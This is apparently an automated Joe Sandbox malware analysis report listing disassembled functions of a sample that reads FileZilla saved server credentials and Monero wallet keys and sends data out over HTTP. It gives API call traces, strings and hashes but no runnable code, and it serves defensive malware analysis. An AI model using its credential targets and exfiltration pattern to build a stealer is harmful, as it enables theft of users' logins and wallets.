Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 043a2d0c315b6fc705ee9e2e20f0a55ccea50cea9ee9b0441cf0ce62eb61a8bd
Instruction ID: 7bd68125ac90a49dcb54b8892a9a4e4ad9865ebf000fbd7c444dbd69181215eb
Opcode Fuzzy Hash: 043a2d0c315b6fc705ee9e2e20f0a55ccea50cea9ee9b0441cf0ce62eb61a8bd
Instruction Fuzzy Hash: E3D130719001089BDB06EBE0DD96DEE7778FF14301F448519F902BA0A5EF34AA0DEB61

Function 00345100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

lstrlen.KERNEL32(00000000), ref: 00345193

Part of subcall function 00358EA0: CryptBinaryToStringA.CRYPT32(00000000,00345184,40000001,00000000,00000000,?,00345184), ref: 00358EC0

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00345207
StrCmpCA.SHLWAPI(?,0136E5D0), ref: 00345225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345340
HttpOpenRequestA.WININET(00000000,0136E4B0,?,0136D9D0,00000000,00000000,00400100,00000000), ref: 003453A4

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0136E5A0,00000000,?,0136A058,00000000,?,003619DC,00000000,?,003551CF), ref: 00345737
lstrlen.KERNEL32(00000000), ref: 0034574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0034575C
RtlAllocateHeap.NTDLL(00000000), ref: 00345763
lstrlen.KERNEL32(00000000), ref: 00345778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003457A9
lstrlen.KERNEL32(00000000), ref: 003457C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003457E1
lstrlen.KERNEL32(00000000,?,?), ref: 0034580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00345822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0034584D
InternetCloseHandle.WININET(00000000), ref: 003458B1
InternetCloseHandle.WININET(00000000), ref: 003458BE
InternetCloseHandle.WININET(00000000), ref: 003458C8

Strings

", xrefs: 00345706
------, xrefs: 0034563B
", xrefs: 003455C4
", xrefs: 00345482
--, xrefs: 00345280
------, xrefs: 003453B7
------, xrefs: 003454F9
------, xrefs: 00345297

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 63e55f28afaa417cb90cc39bab5d62b9bebd2074009986ea2a8647ba49425a19
Instruction ID: 773e1360f41821ed0f54e38d10dbca52d74ab599007052c72fcdca5c6269404c
Opcode Fuzzy Hash: 63e55f28afaa417cb90cc39bab5d62b9bebd2074009986ea2a8647ba49425a19
Instruction Fuzzy Hash: C6323371920518ABDB16EBA0DC91FEE7778BF54701F404259F9067A0A2EF302A4DEF51

Function 0034A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035AA70: StrCmpCA.SHLWAPI(01368BA0,0034A7A7,?,0034A7A7,01368BA0), ref: 0035AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0034AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0034AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0034ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034A8B0

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

lstrcat.KERNEL32(?,00000000), ref: 0034ACEB
lstrcat.KERNEL32(?,00361320), ref: 0034ACFA
lstrcat.KERNEL32(?,00000000), ref: 0034AD0D
lstrcat.KERNEL32(?,00361324), ref: 0034AD1C
lstrcat.KERNEL32(?,00000000), ref: 0034AD2F
lstrcat.KERNEL32(?,00361328), ref: 0034AD3E
lstrcat.KERNEL32(?,00000000), ref: 0034AD51
lstrcat.KERNEL32(?,0036132C), ref: 0034AD60
lstrcat.KERNEL32(?,00000000), ref: 0034AD73
lstrcat.KERNEL32(?,00361330), ref: 0034AD82
lstrcat.KERNEL32(?,00000000), ref: 0034AD95
lstrcat.KERNEL32(?,00361334), ref: 0034ADA4
lstrcat.KERNEL32(?,00000000), ref: 0034ADB7
lstrlen.KERNEL32(?), ref: 0034AE0D
lstrlen.KERNEL32(?), ref: 0034AE1C

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

DeleteFileA.KERNEL32(00000000), ref: 0034AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0034ABD4

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: c06913f7a8d6d402e81de39f8f9642f60f7cc47fb45e89b75aa4b7d10ca0e439
Instruction ID: 6eb890ba8d54e35b4c172d1f309486bb108142c4e8687922e3b9693162a56d30
Opcode Fuzzy Hash: c06913f7a8d6d402e81de39f8f9642f60f7cc47fb45e89b75aa4b7d10ca0e439
Instruction Fuzzy Hash: 1E1202719105089BDB06EBA0DD96DEE7778BF14302F504259F907BA0A1EF346E0DEB62

Function 00345960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003459F8
StrCmpCA.SHLWAPI(?,0136E5D0), ref: 00345A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0136E550,00000000,?,0136A058,00000000,?,00361A1C), ref: 00345E71
lstrlen.KERNEL32(00000000), ref: 00345E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00345E93
RtlAllocateHeap.NTDLL(00000000), ref: 00345E9A
lstrlen.KERNEL32(00000000), ref: 00345EAF
lstrlen.KERNEL32(00000000), ref: 00345ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00345EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00345F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00345F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00345F4C
InternetCloseHandle.WININET(00000000), ref: 00345FB0
InternetCloseHandle.WININET(00000000), ref: 00345FBD
HttpOpenRequestA.WININET(00000000,0136E4B0,?,0136D9D0,00000000,00000000,00400100,00000000), ref: 00345BF8

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

InternetCloseHandle.WININET(00000000), ref: 00345FC7

Strings

", xrefs: 00345E16
", xrefs: 00345CD5
------, xrefs: 00345D4C
------, xrefs: 00345A96
------, xrefs: 00345C0B

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: f0101433210078b07fcbaf6e9d192e218cae5d0ee4857571e951966337812092
Instruction ID: 6ea01536312c24c6e35fe3d636c0c63f2d3dcad5ad5e2b20927be3ed09088093
Opcode Fuzzy Hash: f0101433210078b07fcbaf6e9d192e218cae5d0ee4857571e951966337812092
Instruction Fuzzy Hash: 5E122371820518ABDB16EBA0DC96FDE7778BF14701F404259F9067A0A1EF302A4DEF65

Function 0034CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,0136A088,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,01368840,?,\Monero\wallet.keys,00360E17), ref: 00358B86

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0034D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0034D0CE
lstrcat.KERNEL32(?,00000000), ref: 0034D208
lstrcat.KERNEL32(?,00361478), ref: 0034D217
lstrcat.KERNEL32(?,00000000), ref: 0034D22A
lstrcat.KERNEL32(?,0036147C), ref: 0034D239
lstrcat.KERNEL32(?,00000000), ref: 0034D24C
lstrcat.KERNEL32(?,00361480), ref: 0034D25B
lstrcat.KERNEL32(?,00000000), ref: 0034D26E
lstrcat.KERNEL32(?,00361484), ref: 0034D27D
lstrcat.KERNEL32(?,00000000), ref: 0034D290
lstrcat.KERNEL32(?,00361488), ref: 0034D29F
lstrcat.KERNEL32(?,00000000), ref: 0034D2B2
lstrcat.KERNEL32(?,0036148C), ref: 0034D2C1
lstrcat.KERNEL32(?,00000000), ref: 0034D2D4
lstrcat.KERNEL32(?,00361490), ref: 0034D2E3

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

lstrlen.KERNEL32(?), ref: 0034D32A
lstrlen.KERNEL32(?), ref: 0034D339

Part of subcall function 0035AA70: StrCmpCA.SHLWAPI(01368BA0,0034A7A7,?,0034A7A7,01368BA0), ref: 0035AA8F

DeleteFileA.KERNEL32(00000000), ref: 0034D3B4

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: dc4ba69a362b4c436519d0ccc3b06d9d7336212c5dc03b6f42e749d328632a63
Instruction ID: aab81a9bb34cf54faffc74c36581dfb5740407d596e758ed5b3fdca341790499
Opcode Fuzzy Hash: dc4ba69a362b4c436519d0ccc3b06d9d7336212c5dc03b6f42e749d328632a63
Instruction Fuzzy Hash: 07E123719105089BDB06EBA0DD96EEE7778BF14301F104255F907BB0A1EF35AA0DEB62

Function 00344880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00344915
StrCmpCA.SHLWAPI(?,0136E5D0), ref: 0034493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00344ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00360DDB,00000000,?,?,00000000,?,",00000000,?,0136E430), ref: 00344DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00344E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00344E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00344E49
InternetCloseHandle.WININET(00000000), ref: 00344EAD
InternetCloseHandle.WININET(00000000), ref: 00344EC5
HttpOpenRequestA.WININET(00000000,0136E4B0,?,0136D9D0,00000000,00000000,00400100,00000000), ref: 00344B15

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

InternetCloseHandle.WININET(00000000), ref: 00344ECF

Strings

", xrefs: 00344D33
", xrefs: 00344BF2
------, xrefs: 003449BD
------, xrefs: 00344C69
------, xrefs: 00344B28

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
